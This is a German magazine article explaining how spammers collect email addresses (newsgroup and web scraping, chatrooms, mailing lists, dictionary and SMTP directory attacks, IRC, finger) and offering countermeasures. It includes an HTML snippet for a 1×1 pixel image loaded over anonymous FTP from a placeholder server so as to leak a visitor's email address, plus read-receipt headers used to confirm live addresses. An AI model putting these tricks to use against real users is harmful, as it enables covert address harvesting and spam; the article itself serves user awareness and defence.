Wie kommen Spammer an Email-Adressen?

Spammer, die Versender unverlangter Massenmails, setzen eine Vielzahl von Methoden ein, um an die Adressen ihrer Opfer zu kommen. Teilweise verwenden sie sehr ausgefeilte Technik und hinterhältige Methoden.

Wird eine Email-Adresse irgendwo im Netz veröffentlicht, ist so gut wie sicher, dass sie schon bald in den Adresslisten der Spammer landet. Damit fängt das Problem jedoch erst an. Spammer kaufen, verkaufen oder tauschen Adressen. Meistens landen sie außerdem auf CDs, oft gleich mehrfach auf verschiedenen. Das Ärgernis potenziert sich.

(von Klaus Arnhold)

Einige der Methoden, die Spammer einsetzen um Email-Adressen zu gewinnen, sind nachfolgend beschrieben.

Usenet
Postings in Usenet-Newsgroups sind eine Garantie dafür, in diesen Adresslisten zu landen. Beiträge in Newsgroups werden regelmäßig von automatischen Programmen, so genannten Spam-Bots, auf alles abgegrast, was ein ‚@‘ enthält. Dabei beschränkt man sich nicht nur auf die Kopfzeilen der Nachrichten. Es werden auch der Text, Signaturen usw. abgearbeitet. Es hilft nicht, die verwendete Email-Adresse durch Zusätze wie NOSPAM o. ä. für Spamrobots unbrauchbar zu machen. „De-munging“, d. h. die Entfernung dieser künstlichen Adressbestandteile, gehört zu den Standard-Features der Email-Harvester, der Programme, mit denen Email-Adressen eingesammelt werden.

Webseiten
Neben Usenet-Newsgroups sind Webseiten das zweite, bevorzugte Angriffsziel der Spammer. Harvesting-Programme fragen zuerst die Suchmaschinen zu bestimmten Suchbegriffen ab. Die dann angezeigten Ergebnis-Seiten werden auf alles durchsucht, was nach Email-Adresse aussieht.

An manchen Stellen wird deshalb u. a. empfohlen, Email-Adressen in Webseiten nur in kodierter Form zu veröffentlichen. Die Methode ist jedoch eher wirkungslos, wie an anderer Stelle bereits beschrieben. Jede Kodierung die einem Schema folgt, lässt sich völlig problemlos wieder aushebeln.

Kommt hinzu: Spammer lesen in einschlägigen Anti-Spam-Websites, -Listen oder Abuse-Newsgroups mit. Wird eine neue Abwehrmethode bekannt, modifiziert man die Software entsprechend. Ein Katz-und-Maus-Spiel. Ganz ähnlich wie bei Viren.

Webbrowser
Auch in Webseiten selbst werden verschiedene Tricks eingesetzt, um an Adressen zu kommen. Eine besonders üble Methode ist, 1×1-Pixel Grafiken nicht auf dem normalen Weg, d. h. durch einen HTTP-Aufruf

CODE
<IMG xsrc=“grafik.gif“ WIDTH=“1″ HEIGHT=“1″>

in die Seite einzubinden. Die Grafik wird vielmehr über „anonymes FTP“ eingebunden:

CODE
<IMG xsrc=“ftp://ftp.server.de/spam/grafik.gif“ WIDTH=“1″ HEIGHT=“1″>

Bei FTP-Zugriffen über „Anonymus FTP“ werden als Username ‚anonymous‘ und als Passwort die Email-Adresse des Users durch den Browser übertragen. Diese Übertragung ist für den User jedoch so gut wie nicht erkennbar. Die Email-Adresse kann ferner durch hinterhältige Javascripts in der Webseite ausgelesen werden. Dazu reicht schon, wenn bestimmte Bereiche der Seite mit der Maus überfahren werden.

Abhilfe schafft, in den Einstellungen des Browser nachzuschauen, eine dort eingetragene Email-Adresse zu entfernen oder durch eine nicht existente zu ersetzen.

Chatrooms
Chatrooms sind bei Spammern besonders beliebt. Chats sind regelmäßig eine der ersten Online-Aktivitäten, auf die sich „Newbies“ (Internet-Frischlinge) stürzen. AOL-Chatroms sind dabei für das Sammeln von Adressen besonders interessant. Einerseits deshalb, weil der AOL-Screenname immer identisch mit einer funktionierenden Email-Adresse ist, wenn man ihn um ‚@aol.com‘ ergänzt. AOL-Adressen werden aber auch deshalb bevorzugt, weil diese Neu-User regelmäßig nicht wissen, wie man sich effektiv gegen Spam-Mails wehrt. Beliebtes Angriffsziel sind deshalb außerdem die AOL-Profilseite.

Mailinglisten
Spammer versuchen regelmäßig, auch Adressen aus den Verteilern von Diskussionslisten oder Newsletters zu ergattern. Denn diese Adressen sind fast immer gültig und nicht modifiziert. Manche Listserver, wie z. B. Majordomo, senden auf Anfrage nicht nur eine Aufstellung der darauf vorhandenen Listen. In der Folge lassen sich auch die Adressen in den einzelnen Verteilern abrufen.

Ursprünglich diente diese Funktion dem Komfort der Listenteilnehmer. Heute sollte eine Mailingliste jedoch immer so konfiguriert sein, dass ausschließlich der Listen-Betreiber Zugriff auf die Adressen hat.

Datenbanken
Viele nützliche Spezial-Datenbanken finden sich online. Bei den meisten muss zur Eintragung eine Email-Adresse angegeben werden. Seit neuestem sind Spam-Programme erhältlich, die ermöglichen, diese Datenbanken auszulesen. Der Spammer freut sich, auf die Art gewinnt er sogar segmentierte Adressen. Als Gegenmaßnahme bleibt nur, in solche Datenbanken eine nicht existierende Adresse einzutragen. Oder Adressen zu verwenden, die später selbst still gelegt werden können. Wie z. B. Adressen von Spamgourmet.

Wörterbuch-Attacken
So genannte ‚Dictionary-Attacks‘ sind eine relativ neue Taktik. Es wird davon ausgegangen, dass insbesondere bei großen Freemail-Providern viele Nutzer zu finden sind, die einen „ganz normalen“ Namen tragen. Das Spamprogramm arbeitet ein Namenslexikon ab und versendet wahllos Emails an so erzeugte Adressen. Eine Abwehrmöglichkeit ist, sich bei Freemailern einen Namen auszusuchen, der sehr weit hinten im Alphabet angeordnet ist. Es bestehen gute Chancen dass ein Spamangriff bereits gestoppt wird, noch bevor er das Ende des Alphabets erreicht. Eine andere Gegenstrategie wäre, einen Namen zu wählen, der nicht einfach erraten werden kann.

Verzeichnis-Angriffe
Basierend auf der Methode der Wörterbuch-Attacke kommt zunehmend auch eine andere zum Einsatz. Wörterbuch-Attacken erzeugen zu viel Traffic und damit Aufsehen. Deshalb geht man neuerdings dazu über, erst einmal festzustellen, ob die Adressen überhaupt existieren. Dazu wird für beliebig erzeugte Adressen ein SMTP-Dialog eingeleitet. Das, was stattfindet, noch bevor die eigentliche Mail versandt wird. Existiert nun unter der angeschriebenen Adresse kein User, sendet der Mailserver eine Error-Mail zurück. Für den Spammer gilt: Keine Nachrichten sind gute Nachrichten. Die Adressen, von denen keine Antwort zurückkommt, sind live. Sie können der Datenbank hinzugefügt werden. Gegen diese Art von Angriff ist bis jetzt kein Kraut gewachsen.

In diese Gruppe sind auch Emails einzuordnen, die fehlkonfigurierte Mailprogramme ausnutzen. In eine „Testmail“ werden dazu eine oder zwei zusätzliche Kopfzeilen eingefügt
Return-Receipt-To: Send delivery confirmation
X-Cinfirm-Reading-To: Send a reading confirmation

Viele Mailprogramme, insbesondere von Internet-Neulingen, sind nicht richtig eingestellt. Sie senden auf solche Emails sofort und ohne Nachfrage eine Bestätigung. Der Spammer freut sich: Bingo. Abhilfe: Die Empfangsbestätigung sollte komplett abgeschaltet sein.

Wie zu hören ist, wird dieses Feature seit neuestem gern von PR-Spammern benutzt. Also von PR-Agenturen, für die sich das Thema Online-PR darauf beschränkt, Redaktionen per Flächenbombardement mit Email-Pressemitteilungen einzudecken.

IRC
Einige IRC-Programme (IRC = Internet Relay Chat) übergeben die Email-Adresse des Anwenders an jeden der „fragt“. Zusätzlich werden so genannte IRCbots benutzt, Automaten die diese Aufgabe automatisch erledigen. Ganz gleich ob sich nun jemand auf dem IRC-Kanal befindet oder nicht. Spammer wissen, dass auch diese Adressen ‚live‘ und darum besonders wertvoll sind.

Sonstige Methoden
Es existieren noch einige weitere technische Methoden, die Spamversendern ermöglichen Adressen zu gewinnen. Nur der Vollständigkeit halber sei hier erwähnt, dass durch Missbrauch des finger-Protokolls oder eines fehlkonfigurierten identd von Spammern ebenfalls Email-Adressen gewonnen werden können. ‚finger‘ wird heute jedoch so gut wie nie benötigt. Es sollte grundsätzlich abgeschaltet sein!

Natürlich muss auch berücksichtig werden, dass Adressen-Sammler Print-Publikationen, gedruckte Verzeichnisse usw. durchforsten und Adressen dort schlicht und ergreifend abtippen.

Fazit
Wie eingangs erwähnt, es ist praktisch unvermeidbar, dass irgendwo veröffentlichte Email-Adressen früher oder später in obskure Adressdateien geraten. Eine hundertprozentig wirksame Abwehrstrategie gibt es leider nicht.

Sinnvoll ist auf jeden Fall, grundsätzlich mit zwei Adressen zu arbeiten. Eine Adresse dient für die Öffentlichkeit. Die andere gibt man nur an besonders vertrauenswürdige Personen weiter. In Zusammenwirkung mit verschiedenen Email-Filtern kann so jedenfalls der gröbste Müll eingedämmt werden.

Urheber: Dr. Web Magazin (www.drweb.de) und www.ayom.com